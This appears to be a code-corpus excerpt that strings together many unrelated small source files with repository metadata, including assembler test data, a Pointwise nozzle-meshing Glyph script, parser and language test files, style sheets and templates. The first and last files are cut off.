(R14)(Z29*8) // 62927d43c714ee VSCATTERPF0DPD K5, (R10)(Y29*8) // 6292fd45c62cea VSCATTERPF0DPD K5, (SP)(Y4*2) // 62f2fd4dc62c64 VSCATTERPF0DPD K5, (DX)(Y10*4) // 62b2fd4dc62c92 VSCATTERPF0DPS K3, (DX)(Z10*4) // 62b27d4bc62c92 VSCATTERPF0DPS K3, (AX)(Z4*1) // 62f27d4bc62c20 VSCATTERPF0DPS K3, (SP)(Z4*2) // 62f27d4bc62c64 VSCATTERPF0QPD K4, (DX)(Z10*4) // 62b2fd4cc72c92 VSCATTERPF0QPD K4, (AX)(Z4*1) // 62f2fd4cc72c20 VSCATTERPF0QPD K4, (SP)(Z4*2) // 62f2fd4cc72c64 VSCATTERPF0QPS K2, (BP)(Z10*2) // 62b27d4ac76c5500 VSCATTERPF0QPS K2, (R10)(Z29*8) // 62927d42c72cea VSCATTERPF0QPS K2, (R14)(Z29*8) // 62927d42c72cee VSCATTERPF1DPD K2, (R14)(Y29*8) // 6292fd42c634ee VSCATTERPF1DPD K2, (AX)(Y4*1) // 62f2fd4ac63420 VSCATTERPF1DPD K2, (BP)(Y10*2) // 62b2fd4ac6745500 VSCATTERPF1DPS K3, (BP)(Z10*2) // 62b27d4bc6745500 VSCATTERPF1DPS K3, (R10)(Z29*8) // 62927d43c634ea VSCATTERPF1DPS K3, (R14)(Z29*8) // 62927d43c634ee VSCATTERPF1QPD K3, (DX)(Z10*4) // 62b2fd4bc73492 VSCATTERPF1QPD K3, (AX)(Z4*1) // 62f2fd4bc73420 VSCATTERPF1QPD K3, (SP)(Z4*2) // 62f2fd4bc73464 VSCATTERPF1QPS K3, (BP)(Z10*2) // 62b27d4bc7745500 VSCATTERPF1QPS K3, (R10)(Z29*8) // 62927d43c734ea VSCATTERPF1QPS K3, (R14)(Z29*8) // 62927d43c734ee RET
GAS
1
Havoc-OS/androidprebuilts_go_linux-x86
src/cmd/asm/internal/asm/testdata/avx512enc/avx512pf.s
[ "BSD-3-Clause" ]
1 0 1 0
NetLinx
0
mdp19pn/Chaste
mesh/test/data/3D_Single_tetrahedron_element.axi
[ "Apache-2.0", "BSD-3-Clause" ]
- page_title _("Gitea Import") %h3.page-title = custom_icon('gitea_logo') = _('Import Projects from Gitea') = render 'import/githubish_status', provider: 'gitea'
Haml
2
Testiduk/gitlabhq
app/views/import/gitea/status.html.haml
[ "MIT" ]
# ============================================================= # This script is written to generate structured multi-block # grid for a nozzle profile with respect to grid guideline. #============================================================== # written by Pay Dehpanah # last update: Sep 2021 #============================================================== package require PWI_Glyph 3.18.3 proc Config_Prep { } { global defset guidelineDir MeshParameters MparafullFilename res_lev if { $MeshParameters != "" } { puts "GRID VARIABLES ARE SET BY $MeshParameters" set defset [ParamDefualt $MparafullFilename] } else { puts "DEFAULT GRID VARIABLES ARE SET BY defaultMeshParameters.glf" } #updating gridflow.py with new sets of variables GridFlowprop_Update [lrange [lindex $defset 0] end-6 end] [lrange [lindex $defset 1] end-6 end] $guidelineDir MGuideLine $res_lev $guidelineDir } proc CAD_Read {nzzpf} { global cae_solver GRD_TYP nprofile nx_node ny_node upvar 1 symsepdd asep #grid tolerance pw::Grid setNodeTolerance 1.0e-10 pw::Grid setConnectorTolerance 1.0e-10 pw::Grid setGridPointTolerance 1.0e-10 pw::Connector setCalculateDimensionMaximum 100000 pw::Application setCAESolver $cae_solver 2 if {[string compare $GRD_TYP STR]==0} { puts "STRUCTURED MULTIBLOCK GRID SELECTED." puts $asep } if { $nprofile != "" } { set fpmod [open $nzzpf r] while {[gets $fpmod line] >= 0} { lappend nx_node [scan [string range $line 0 10] %12f] lappend ny_node [scan [string range $line 10 19] %12f] } close $fpmod puts "NOZZLE PROFILE IMPORTED." puts $asep } else { puts "PLEASE INDICATE NOZZLE PROFILE AS INPUT." } } proc Nzz_Geo { } { global nx_node ny_node nozzUpperCurve nozzLowerCurve nozzTeCurve nozzLowerCurve_sp # NOZZLE GEOMETRY # ----------------------------------------------- # Create upper surface set nozzUpperPts [pw::SegmentSpline create] $nozzUpperPts setSlope Free for {set i 0} {$i <= 191} {incr i} { $nozzUpperPts addPoint [list [lindex $nx_node $i] [lindex $ny_node $i] 0] } set nozzUpperCurve [pw::Curve create] $nozzUpperCurve addSegment $nozzUpperPts # Create lower surface set nozzLowerPts [pw::SegmentSpline create] $nozzLowerPts setSlope Free for {set i 192} {$i < 624} {incr i} { $nozzLowerPts addPoint [list [lindex $nx_node $i] [lindex $ny_node $i] 0] } set nozzLowerCurve [pw::Curve create] $nozzLowerCurve addSegment $nozzLowerPts # Create thickness set nozzTePts [pw::SegmentSpline create] $nozzTePts setSlope Free for {set i 191} {$i <= 192} {incr i} { $nozzTePts addPoint [list [lindex $nx_node $i] [lindex $ny_node $i] 0] } set nozzTeCurve [pw::Curve create] $nozzTeCurve addSegment $nozzTePts #-------------------------------------------------- set nozzLowerCurve_sp [$nozzLowerCurve split [$nozzLowerCurve getParameter -X [lindex $nx_node 0]]] } proc FWH_Update { } { global scriptDir res_lev gridname gridnameFWHint gridnameFWHmrk upvar 1 symsep asep #updating FWHMaker generator with new mesh infos exec sed -i "/set res_lev/d" $scriptDir/FWHMarker.tcl exec sed -i "4 a set res_lev $res_lev" $scriptDir/FWHMarker.tcl exec sed -i "/set unmarked/d" $scriptDir/FWHMarker.tcl exec sed -i "5 a set unmarked $gridname.su2" $scriptDir/FWHMarker.tcl exec sed -i "/set interfaced/d" $scriptDir/FWHMarker.tcl exec sed -i "6 a set interfaced $gridnameFWHint.su2" $scriptDir/FWHMarker.tcl exec sed -i "/set gridunmarked/d" $scriptDir/FWHMarker.tcl exec sed -i "7 a set gridunmarked $gridnameFWHmrk.su2" $scriptDir/FWHMarker.tcl set dashes [string repeat - 70] puts $dashes puts "GRID INFO FOR $gridname IS EXPORTED TO FWHMarker.tcl!" puts $asep } proc NZZMESHER {} { global MeshParameters nprofile NprofullFilename MparafullFilename global res_lev ypg dsg grg chord_sg global scriptDir fexmod defset set symsep [string repeat = 105] set symsepd [string repeat . 105] set symsepdd [string repeat - 105] if { $NprofullFilename == "" } { if [pw::Application isInteractive] { set NprofullFilename [tk_getOpenFile] } } if { ! [file readable $NprofullFilename] } { puts "WITHOUT NOZZLE COORDINATES AS INPUT THIS SCRIPT DOESN'T WORK." puts "NOZZLE COORDINATES: $nprofile does not exist or is not readable" exit -1 } #---------------------------------------------------------------------------- #READING AND UPDATING GRID PARAMETERS AND VARIABLES Config_Prep puts $symsepdd puts "GRID GUIDELINE: Level: $res_lev | Y+: $ypg | Delta_S(m): $dsg | GR: $grg | Nozzle_Spacing(m): $chord_sg" puts $symsep set meshparacol [lindex $defset 1] set defParas [lindex $defset 0] set time_start [pwu::Time now] #---------------------------------------------------------------------------- #READING CAD MODEL CAD_Read $NprofullFilename #---------------------------------------------------------------------------- #CREATING NOZZLE PROFILE Nzz_Geo set blkexam [pw::Examine create BlockVolume] #---------------------------------------------------------------------------- #GENERATING THE MESH set nzzblks [Nozzle_Mesh] #---------------------------------------------------------------------------- set fexmod [open "$scriptDir/CAE_export.out" w] #---------------------------------------------------------------------------- #CAE EXPORT CAE_Export $nzzblks #---------------------------------------------------------------------------- #FWH UPDATER FWH_Update pw::Display saveView 1 [list {0.0 0.0 0.0} {-18.37 -6.89 0.0} {0.14 -1.0 -0.06} 50.40 111.60] pw::Display recallView 1 set time_end [pwu::Time now] set runtime [pwu::Time subtract $time_end $time_start] set tmin [expr int([lindex $runtime 0]/60)] set tsec [expr [lindex $runtime 0]%60] set tmsec [expr int(floor([lindex $runtime 1]/1000))] puts $fexmod [string repeat - 50] puts $fexmod "runtime: $tmin min $tsec sec $tmsec ms" puts $fexmod [string repeat - 50] close $fexmod puts "GRID INFO WRITTEN TO CAE_export.out" puts $symsep puts "COMPLETE!" exit } #-------------------------------------- RESET APPLICATION-------------------------------------- pw::Application reset pw::Application clearModified set scriptDir [file dirname [info script]] set guidelineDir [file join $scriptDir guideline] source [file join $scriptDir "ParamRead.glf"] source [file join $guidelineDir "GridParamUpdate.glf"] source [file join $scriptDir "MeshGuideline.glf"] source [file join $scriptDir "nozz_mesh.glf"] source [file join $scriptDir "cae_exporter.glf"] set defset [ParamDefualt [file join $scriptDir "defaultMeshParameters.glf"]] set MeshParameters "" set nprofile "" set MeshParameters "" set nprofile "" set NprofullFilename "" set MparafullFilename "" if [pw::Application isInteractive] { pw::Script loadTK set wkrdir [pwd] proc meshparametersgui { } { global wkrdir MeshParameters MparafullFilename cd $wkrdir if { $MeshParameters != "" } { file exists $MparafullFilename puts "Input parameters: $MeshParameters" } else { set types { {{GLYPH Files} {.glf}} {{All Files} * } } set initDir $::wkrdir set MparafullFilename [tk_getOpenFile -initialdir $initDir -filetypes $types] set MeshParameters [file tail $MparafullFilename] } } proc nzzprofile { } { global wkrdir nprofile NprofullFilename cd $wkrdir if { $NprofullFilename != "" } { file exists $NprofullFilename puts "Input nozzle coordinates: $nprofile" } else { set types { {{Text Files} {.txt}} {{All Files} * } } set initDir $::wkrdir set NprofullFilename [tk_getOpenFile -initialdir $initDir -filetypes $types] set nprofile [file tail $NprofullFilename] } } wm title . "NOZZLE MESHER" grid [ttk::frame .c -padding "5 5 5 5"] -column 0 -row 0 -sticky nwes grid columnconfigure . 0 -weight 1; grid rowconfigure . 0 -weight 1 grid [ttk::labelframe .c.lf -padding "5 5 5 5" -text "SELECT MESH PARAMETERS"] grid [ttk::button .c.lf.mfl -text "MESHING INPUT" -command \ meshparametersgui] -row 1 -column 1 -sticky e grid [ttk::entry .c.lf.mfe -width 60 -textvariable MeshParameters] -row 1 -column 2 -sticky e grid [ttk::button .c.lf.ptl -text "NOZZLE PROFILE" -command nzzprofile] -row 2 -column 1 -sticky e grid [ttk::entry .c.lf.pte -width 60 -textvariable nprofile] -row 2 -column 2 -sticky e grid [ttk::button .c.lf.gob -text "NOZZLE MESH" -command NZZMESHER] -row 3 -column 2 -sticky e foreach w [winfo children .c.lf] {grid configure $w -padx 5 -pady 5} focus .c.lf.mfl ::tk::PlaceWindow . widget bind . <Return> { NZZMESHER } } else { if {[llength $argv] == 2} { set MparafullFilename [lindex $argv 0] set NprofullFilename [lindex $argv 1] set nprofile [file tail $NprofullFilename] set MeshParameters [file tail $MparafullFilename] } elseif {[llength $argv] == 1} { set NprofullFilename [lindex $argv 0] set nprofile [file tail $NprofullFilename] } else { puts "Invalid command line input! WITHOUT NOZZLE PROFILE AS INPUT THIS SCRIPT DOESN'T WORK." puts "Usage: pointwise -b NZZmesher.glf ?MeshParameters.glf? nozzle_profile.txt <Profile File>" exit } NZZMESHER }
Glyph
5
pdpdhp/nozzlemesher
NZZmesher.glf
[ "BSD-3-Clause" ]
%% %unicode 11.0 %public %class UnicodeScripts_11_0_extensions_5 %type int %standalone %include ../../resources/common-unicode-all-enumerated-property-defined-values-only-java %% <<EOF>> { printOutput(); return 1; } \p{Script_Extensions:Gujarati} { setCurCharPropertyValue("Script_Extensions:Gujarati"); } \p{Script_Extensions:Katakana} { setCurCharPropertyValue("Script_Extensions:Katakana"); } \p{Script_Extensions:Manichaean} { setCurCharPropertyValue("Script_Extensions:Manichaean"); } [^] { }
JFlex
3
Mivik/jflex
testsuite/testcases/src/test/cases/unicode-scripts/UnicodeScripts_11_0_extensions_5.flex
[ "BSD-3-Clause" ]
import 'std/string' as str import "std/test" test.run("String module contains", fn(assert) { const testStr = "one,two,three" assert.isTrue(str.contains(testStr, "two")) assert.isFalse(str.contains(testStr, "Two")) }) test.run("String module count", fn(assert) { const testStr = "one,two,three" assert.isEq(str.count(testStr, ","), 2) assert.shouldThrow(fn() { str.count(testStr, "") }) }) test.run("String module dedup", fn(assert) { const testStr = "name: John" const expected = "name: John" assert.isEq(str.dedup(testStr, " "), expected) }) test.run("String module format", fn(assert) { const formatted = str.format("My name is {} and I'm {} years old", "John", 25) const expected = "My name is John and I'm 25 years old" assert.isEq(formatted, expected) }) test.run("String module hasPrefix", fn(assert) { const testStr = "abcefguvwxyz" assert.isTrue(str.hasPrefix(testStr, "abc")) assert.isFalse(str.hasPrefix(testStr, "abcf")) }) test.run("String module hasSuffix", fn(assert) { const testStr = "abcefguvwxyz" assert.isTrue(str.hasSuffix(testStr, "xyz")) assert.isFalse(str.hasSuffix(testStr, "vxyz")) }) test.run("String module replace", fn(assert) { const testStr = "oink oink oink" let expected = "oinky oinky oink" assert.isEq(str.replace(testStr, "k", "ky", 2), expected) expected = "moo moo moo" assert.isEq(str.replace(testStr, "oink", "moo", -1), expected) assert.shouldThrow(fn() { str.replace(testStr, "", "moo", -1) }) }) test.run("String module split", fn(assert) { const testStr = "one,two,three" const splits = str.split(testStr, ",") assert.isEq(len(splits), 3) }) test.run("String module splitN", fn(assert) { const testStr = "one,two,three" const splits = str.splitN(testStr, ",", 2) assert.isEq(len(splits), 2) }) test.run("String module trim space", fn(assert) { const testStr = " test " const expected = "test" assert.isEq(str.trimSpace(testStr), expected) })
Inform 7
4
lfkeitel/nitrogen
tests/stdlib/string.ni
[ "BSD-3-Clause" ]
[Desktop Entry] Version=1.0 Type=Application Name=Dust3D Comment=A quick 3D modeling tool Categories=Graphics; Icon=dust3d Exec=dust3d Terminal=false
desktop
2
MelvinG24/dust3d
ci/dust3d.desktop
[ "MIT" ]
// Check that we can manually implement an object-unsafe trait for its trait object. // run-pass #![feature(object_safe_for_dispatch)] trait Bad { fn stat() -> char { 'A' } fn virt(&self) -> char { 'B' } fn indirect(&self) -> char { Self::stat() } } trait Good { fn good_virt(&self) -> char { panic!() } fn good_indirect(&self) -> char { panic!() } } impl<'a> Bad for dyn Bad + 'a { fn stat() -> char { 'C' } fn virt(&self) -> char { 'D' } } struct Struct {} impl Bad for Struct {} impl Good for Struct {} fn main() { let s = Struct {}; let mut res = String::new(); // Directly call static. res.push(Struct::stat()); // "A" res.push(<dyn Bad>::stat()); // "AC" let good: &dyn Good = &s; // These look similar enough... let bad = unsafe { std::mem::transmute::<&dyn Good, &dyn Bad>(good) }; // Call virtual. res.push(s.virt()); // "ACB" res.push(bad.virt()); // "ACBD" // Indirectly call static. res.push(s.indirect()); // "ACBDA" res.push(bad.indirect()); // "ACBDAC" assert_eq!(&res, "ACBDAC"); }
Rust
4
Eric-Arellano/rust
src/test/ui/rfc-2027-object-safe-for-dispatch/manual-self-impl-for-unsafe-obj.rs
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
@import './_variables.scss' .v-color-picker__canvas $root: & position: relative overflow: hidden contain: strict &-dot position: absolute top: 0 left: 0 width: $color-picker-canvas-dot-size height: $color-picker-canvas-dot-size background: transparent border-radius: 50% box-shadow: $color-picker-canvas-dot-box-shadow &--disabled box-shadow: $color-picker-canvas-dot-disabled-box-shadow #{$root}:hover & will-change: transform
Sass
4
ahmadiqbal1/vuetify
packages/vuetify/src/components/VColorPicker/VColorPickerCanvas.sass
[ "MIT" ]
GET /test HTTP/1.1\r\n Long-header: 0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345\r\n \r\n
HTTP
2
ThePrez/gunicorn
tests/requests/invalid/017.http
[ "MIT" ]
-- vararg bubbling f = (...) -> #{...} dont_bubble = -> [x for x in ((...)-> print ...)("hello")] k = [x for x in ((...)-> print ...)("hello")] j = for i=1,10 (...) -> print ... -- bubble me m = (...) -> [x for x in *{...} when f(...) > 4] x = for i in *{...} do i y = [x for x in *{...}] z = [x for x in hallo when f(...) > 4] a = for i=1,10 do ... b = for i=1,10 -> print ...
MoonScript
2
Shados/moonscript
spec/inputs/bubbling.moon
[ "MIT", "Unlicense" ]
{% extends '@SyliusCore/Email/passwordReset.html.twig' %}
Twig
2
orestshes/Sylius
src/Sylius/Bundle/ShopBundle/Resources/views/Email/passwordReset.html.twig
[ "MIT" ]
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128" target triple = "x86_64--linux" @main.v1 = local_unnamed_addr global i1 true define void @runtime.initAll() unnamed_addr { entry: ret void }
LLVM
2
ybkimm/tinygo
interp/testdata/interface.out.ll
[ "Apache-2.0" ]
Begin function declaration. sayHello = -> Print a greeting. console.log 'hi'
Literate CoffeeScript
3
looker/grunt-contrib-coffee
test/fixtures/litcoffee.litcoffee
[ "MIT" ]
global _start %include "header.inc" fldz fldz fdivr %include "footer.inc"
Assembly
1
brenden7158/v86
tests/nasm/fdivr.asm
[ "BSD-2-Clause" ]
"use strict"; var _interopRequireDefault = require("@babel/runtime/helpers/interopRequireDefault"); Object.defineProperty(exports, "__esModule", { value: true }); exports.default = void 0; var _createSvgIcon = _interopRequireDefault(require("./utils/createSvgIcon")); var _jsxRuntime = require("react/jsx-runtime"); var _default = (0, _createSvgIcon.default)( /*#__PURE__*/(0, _jsxRuntime.jsx)("path", { d: "M21 12V6c0-1.1-.9-2-2-2h-1V2h-2v2H8V2H6v2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h7v-2H5V10h14v2h2zm-5.36 8c.43 1.45 1.77 2.5 3.36 2.5 1.93 0 3.5-1.57 3.5-3.5s-1.57-3.5-3.5-3.5c-.95 0-1.82.38-2.45 1H18V18h-4v-4h1.5v1.43c.9-.88 2.14-1.43 3.5-1.43 2.76 0 5 2.24 5 5s-2.24 5-5 5c-2.42 0-4.44-1.72-4.9-4h1.54z" }), 'EventRepeat'); exports.default = _default;
JavaScript
4
dany-freeman/material-ui
packages/mui-icons-material/lib/EventRepeat.js
[ "MIT" ]
-- {-# OPTIONS --allow-unsolved-metas #-} module Issue2369.OpenIP where test : Set test = {!!} -- unsolved interaction point -- postulate A : {!!}
Agda
3
shlevy/agda
test/Fail/Issue2369/OpenIP.agda
[ "BSD-3-Clause" ]
/// <reference path='fourslash.ts' /> /////*1*/interface Gourai { new () {} } /////*2*/type Stylet = { new () {} } format.document(); goTo.marker("1"); verify.currentLineContentIs("interface Gourai { new() { } }"); goTo.marker("2"); verify.currentLineContentIs("type Stylet = { new() { } }");
TypeScript
3
nilamjadhav/TypeScript
tests/cases/fourslash/formattingOnConstructorSignature.ts
[ "Apache-2.0" ]
- explore: the_switchboard view_label: 'Company' joins: - join: account sql_on: ${the_switchboard.account_id} = ${account.id} relationship: many_to_one - join: account_owner from: user sql_on: ${account.owner_id} = ${account_owner.id} relationship: many_to_one - join: contact sql_on: ${the_switchboard.contact_id} = ${contact.id} relationship: many_to_one - join: lead sql_on: ${the_switchboard.lead_id} = ${lead.id} relationship: many_to_one - join: opportunity sql_on: ${the_switchboard.opportunity_id} = ${opportunity.id} relationship: many_to_one - join: opportunity_owner from: user sql_on: ${opportunity.owner_id} = ${opportunity_owner.id} relationship: many_to_one
LookML
3
rsharma03/blocks_salesforce
submodules/the_switchboard/salesforce.model.lookml
[ "MIT" ]
export { value, ns } from "./package";
JavaScript
1
1shenxi/webpack
test/cases/scope-hoisting/side-effects-9159/reexport.js
[ "MIT" ]
import torch def is_available(): r"""Returns whether PyTorch is built with OpenMP support.""" return torch._C.has_openmp
Python
3
Hacky-DH/pytorch
torch/backends/openmp/__init__.py
[ "Intel" ]
NAME VTK::Interaction LIBRARY_NAME vtkInteraction DESCRIPTION Components for accepting user interaction
Kit
0
txwhhny/vtk
Interaction/Style/vtk.kit
[ "BSD-3-Clause" ]
DROP TABLE "public"."table48";
SQL
0
devrsi0n/graphql-engine
cli/commands/testdata/migrate-squash-test/migrations/1588172670697_create_table_public_table48/down.sql
[ "Apache-2.0", "MIT" ]
create table employee(id int identity primary key, name varchar(30));
SQL
4
zeesh49/tutorials
guest/spring-boot-app/src/main/resources/mySchema.sql
[ "MIT" ]
.class{border:1px solid $color; }
CSS
1
fuelingtheweb/prettier
tests/stylefmt/shorthand-with-sass-variables/shorthand-with-sass-variables.css
[ "MIT" ]
using System; using System.Collections.Generic; using System.IO; using System.Text; using Sharpility.Extensions; using NodaTime; {{#imports}}using {{import}}; {{/imports}} namespace {{packageName}}.{{packageContext}}.Models { {{#models}} {{#model}} {{#isEnum}}{{>modelEnum}}{{/isEnum}}{{^isEnum}}{{>modelGeneric}}{{/isEnum}} {{/model}} {{/models}} }
HTML+Django
3
MalcolmScoffable/openapi-generator
modules/openapi-generator/src/main/resources/csharp-nancyfx/model.mustache
[ "Apache-2.0" ]
<x><![CDATA[ declare namespace m0="http://services.samples"; declare variable $code as xs:string external; declare variable $price as xs:double external; <m:CheckPriceResponse xmlns:m="http://services.samples" xmlns:m1="http://services.samples/xsd"> <m1:Code>{$code}</m1:Code> <m1:Price>{$price}</m1:Price> </m:CheckPriceResponse> ]]></x>
XQuery
3
isuruuy429/product-ei
samples/product/src/main/conf/synapse/resources/xquery/xquery_res.xq
[ "Apache-2.0" ]
#!/usr/bin/osascript # Required parameters: # @raycast.schemaVersion 1 # @raycast.title Open Deep Link # @raycast.mode compact # Optional parameters: # @raycast.argument1 { "type": "text", "placeholder": "Deep Link" } # Documentation: # @raycast.description Opens a URL inside the currently booted iOS Simulator. Can be used to open deeplinks # @raycast.author Tomás Martins # @raycast.authorURL https://github.com/tfmart # @raycast.icon 🔗 # @raycast.packageName Developer Utilities # @raycast.schemaVersion 1 on run argv do shell script "xcrun simctl openurl booted " & (item 1 of argv) end run
AppleScript
4
daviddzhou/script-commands
commands/developer-utils/open-link-simulator.applescript
[ "MIT" ]
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns:mv="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"> <head> <meta name="Title" content=""> <meta name="Keywords" content=""> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="ProgId" content="Word.Document"> <meta name="Generator" content="Microsoft Word 14"> <meta name="Originator" content="Microsoft Word 14"> <link rel="File-List" href="file://localhost/Users/bengotow/Library/Caches/TemporaryItems/msoclip/0/clip_filelist.xml"> <link rel="Edit-Time-Data" href="file://localhost/Users/bengotow/Library/Caches/TemporaryItems/msoclip/0/clip_editdata.mso"> <!--[if !mso]> <style>@namespace "http://www.w3.org/1999/xhtml"; html { display: block } head { display: none } meta { display: none } title { display: none } link { display: none } style { display: none } script { display: none } body { display: block; margin: 8px } body:-webkit-full-page-media { background-color: rgb(0, 0, 0) } p { display: block; -webkit-margin-before: 1__qem; -webkit-margin-after: 1__qem; -webkit-margin-start: 0; -webkit-margin-end: 0; } div { display: block } layer { display: block } article, aside, footer, header, hgroup, main, nav, section { display: block } marquee { display: inline-block; } address { display: block } blockquote { display: block; -webkit-margin-before: 1__qem; -webkit-margin-after: 1em; -webkit-margin-start: 40px; -webkit-margin-end: 40px; } figcaption { display: block } figure { display: block; -webkit-margin-before: 1em; -webkit-margin-after: 1em; -webkit-margin-start: 40px; -webkit-margin-end: 40px; } q { display: inline } q:before { content: open-quote; } q:after { content: close-quote; } center { display: block; text-align: -webkit-center } hr { display: block; -webkit-margin-before: 0.5em; -webkit-margin-after: 0.5em; -webkit-margin-start: auto; -webkit-margin-end: auto; border-style: inset; border-width: 1px } map { display: inline } video { object-fit: contain; } h1 { display: block; font-size: 2em; -webkit-margin-before: 0.67__qem; -webkit-margin-after: 0.67em; -webkit-margin-start: 0; -webkit-margin-end: 0; font-weight: bold } :-webkit-any(article,aside,nav,section) h1 { font-size: 1.5em; -webkit-margin-before: 0.83__qem; -webkit-margin-after: 0.83em; } :-webkit-any(article,aside,nav,section) :-webkit-any(article,aside,nav,section) h1 { font-size: 1.17em; -webkit-margin-before: 1__qem; -webkit-margin-after: 1em; } :-webkit-any(article,aside,nav,section) :-webkit-any(article,aside,nav,section) :-webkit-any(article,aside,nav,section) h1 { font-size: 1.00em; -webkit-margin-before: 1.33__qem; -webkit-margin-after: 1.33em; } :-webkit-any(article,aside,nav,section) :-webkit-any(article,aside,nav,section) :-webkit-any(article,aside,nav,section) :-webkit-any(article,aside,nav,section) h1 { font-size: .83em; -webkit-margin-before: 1.67__qem; -webkit-margin-after: 1.67em; } :-webkit-any(article,aside,nav,section) :-webkit-any(article,aside,nav,section) :-webkit-any(article,aside,nav,section) :-webkit-any(article,aside,nav,section) :-webkit-any(article,aside,nav,section) h1 { font-size: .67em; -webkit-margin-before: 2.33__qem; -webkit-margin-after: 2.33em; } h2 { display: block; font-size: 1.5em; -webkit-margin-before: 0.83__qem; -webkit-margin-after: 0.83em; -webkit-margin-start: 0; 